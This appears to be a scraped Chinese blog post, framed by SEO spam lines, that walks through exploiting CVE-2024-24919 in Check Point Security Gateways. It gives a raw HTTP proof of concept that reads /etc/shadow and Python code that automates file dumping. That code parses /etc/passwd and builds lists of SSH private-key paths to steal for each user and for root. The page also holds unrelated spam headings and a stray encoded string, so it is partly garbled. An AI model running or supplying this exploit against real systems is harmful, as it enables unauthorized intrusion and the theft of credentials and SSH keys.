网站推广对企业的优势网页加速器app
2026/1/18 14:25:22
h5响应式网站制作百度推广一级代理商名单
h5响应式网站制作,百度推广一级代理商名单,做app需要学什么,东莞常平核酸检测点链式利用CVE-2024–24919#xff1a;通过Checkpoint安全网关LFI漏洞获取更敏感的发现
2024年4月28日#xff0c;NVD发布了一个关于Check Point安全网关LFI#xff08;本地文件包含#xff09;的CVE。更深入的细节可以在https://labs.watchtowr.com/check-point-wrong-check…链式利用CVE-2024–24919通过Checkpoint安全网关LFI漏洞获取更敏感的发现2024年4月28日NVD发布了一个关于Check Point安全网关LFI本地文件包含的CVE。更深入的细节可以在https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ 找到这本质上是一个敏感信息泄露漏洞。攻击者不仅能够泄露普通的敏感信息甚至可以直接转储/etc/shadow文件这是非常严重的情况因为shadow文件包含了机器用户凭证的哈希值。本篇博客并非关于破解shadow文件而是关于“我们如何链式利用这些敏感文件泄露来发现更敏感的文件例如SSH密钥”。简单的POC概念验证POST /clients/MyCRL HTTP/1.1 Host: 127.0.0.1 Sec-Ch-Ua: Not_A Brand;v8, Chromium;v120 Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: Windows Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q0.9 Priority: u0, i Connection: close aCSHELL/../../../../../../../../../../../etc/shadow服务器将把shadow文件作为响应返回给你这非常容易。只需通过POST方法发送路径我们就能获取shadow文件。如果密码强度很高用Hashcat破解可能需要很长时间。于是我想“如果我们有能力读取任何文件那让我们去读取SSH的id_rsa密钥吧。”但这很困难。我想检查那里存在的每个用户看看这些用户的home目录是否包含SSH密钥。要求用户名路径自动化检查器首先我们来构建检查器它将像上面的原始请求POC一样向Web服务器发送请求。上面HTTP原始请求的Python3版本如下。defexploit(ip,path):targetfhttps://{ip}/clients/MyCRLdatafaCSHELL/../../../../../../../../../../..{path}headers{Host:ip,User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0,Te:trailers,Dnt:1,Connection:keep-alive,Content-Length:48}try:responserequests.post(target,headersheaders,datadata,verifyFalse,timeout5)ifresponse.status_code200:print(f{Fore.GREEN}[]{Fore.WHITE}Dumped{Fore.GREEN}{path}{Fore.WHITE}from{Fore.GREEN}{ip}{Fore.WHITE}successfully)print(f{Fore.GREEN}[]{Fore.WHITE}Response:{response.text})dataf[] Dumped{path}from{ip}successfully\n[] Response:{response.text}\nwithopen(dumped.txt,a)asfile:file.write(data)else:print(f{Fore.RED}[-]{Fore.WHITE}Failed to dump{Fore.RED}{path}{Fore.WHITE}from{Fore.RED}{ip}{Fore.WHITE})exceptExceptionase:print(f{Fore.RED}[-]{Fore.WHITE}Failed to dump{Fore.RED}{path}{Fore.WHITE}from{Fore.RED}{ip}{Fore.WHITE}:{e})现在我们需要从服务器提取用户名。通常/etc/passwd文件包含用户列表。root:!:0:0:root:/:/bin/false nobody:x:99:99:nobody:/nonexistent:/bin/false ntp:x:38:38::/nonexistent:/bin/false rpm:x:37:37::/nonexistent:/bin/false pcap:x:77:77::/nonexistent:/bin/false ace:x:0:0:Linux User,,,:/:/bin/clish joker:x:0:0:Linux User,,,:/:/bin/clish sysBadmin:x:0:0:Linux User,,,:/:/bin/clish Thema:x:0:0:Linux User,,,:/:/bin/clish有一些不存在的用户如ntp、rpm、pcap我们不需要这些用户。因此让我们编写一个简单的Python3脚本来实现这一点。defusernames(passwd_content):usernames[]linespasswd_content.split(\n)forlineinlines:partsline.split(:)iflen(parts)7:usernameparts[0]shellparts[-1].strip()ifshellnotin[/sbin/nologin,/bin/false,/usr/sbin/nologin,/bin/sync]:usernames.append(username)returnusernames我通过移除那些使用/sbin/nologin、/bin/falseshell的用户简化了这个任务。现在我们有了用户列表需要为这些用户创建RSA密钥的路径列表。usernameusernames(passwd)sshkeypathlists[]foruserinusername:sshkeypathlists.append(f/home/{user}/.ssh/id_rsa)sshkeypathlists.append(f/home/{user}/.ssh/id_dsa)sshkeypathlists.append(f/home/{user}/.ssh/id_ecdsa)sshkeypathlists.append(f/home/{user}/.ssh/id_ed25519)sshkeypathlists.end(f/home/{user}/.ssh/config)sshkeypathlists.append(f/home/{user}/.ssh/identity)sshkeypathlists.append(f/home/{user}/.ssh/id_rsa.pub)sshkeypathlists.append(f/home/{user}/.ssh/id_dsa.pub)sshkeypathlists.append(f/home/{user}/.ssh/id_ecdsa.pub)sshkeypathlists.append(f/home/{user}/.ssh/id_ed25519.pub)sshkeypathlists.append(f/home/{user}/.ssh/authorized_keys.pub)sshkeypathlists.append(f/home/{user}/.ssh/known_hosts.pub)sshkeypathlists.append(f/home/{user}/.ssh/config.pub)sshkeypathlists.append(f/home/{user}/.ssh/identity.pub)sshkeypathlists.append(f/root/.ssh/id_rsa)sshkeypathlists.append(f/root/.ssh/id_dsa)sshkeypathlists.append(f/root/.ssh/id_ecdsa)sshkeypathlists.append(f/root/.ssh/id_ed25519)sshkeypathlists.append(f/home/{user}/.ssh/known_hosts)id_rsa密钥的泄露通过这种方法得到了更好的梳理它只会检查root和现有用户的home目录中的密钥。现在让我们把所有东西结合起来。首先测试一下这些函数是否工作完美。现在让我们把它们组合起来并添加一些并发处理以提高速度。仅将此脚本用于教育目的我对您的任何恶意行为概不负责。感谢Ashraful通知我这个CVE。Ashraful的Twitterhttps://x.com/myselfAshrafulCSD0tFqvECLokhw9aBeRqh4hzNr1jcA74GEiUTM92Y2QfFPyT3PMy/YqFcTbwddRgmtw15BcOqFaRn6qsQZ5lKdz3ZbpXl8L0OXzLCPvKrd2MgSSiisveuodCEF53JkX0JqMgBwx21srCGhYSj4XobOwlr/3z1MWNHqNJcN3qptuAYGIH4ysv05HoGbi更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享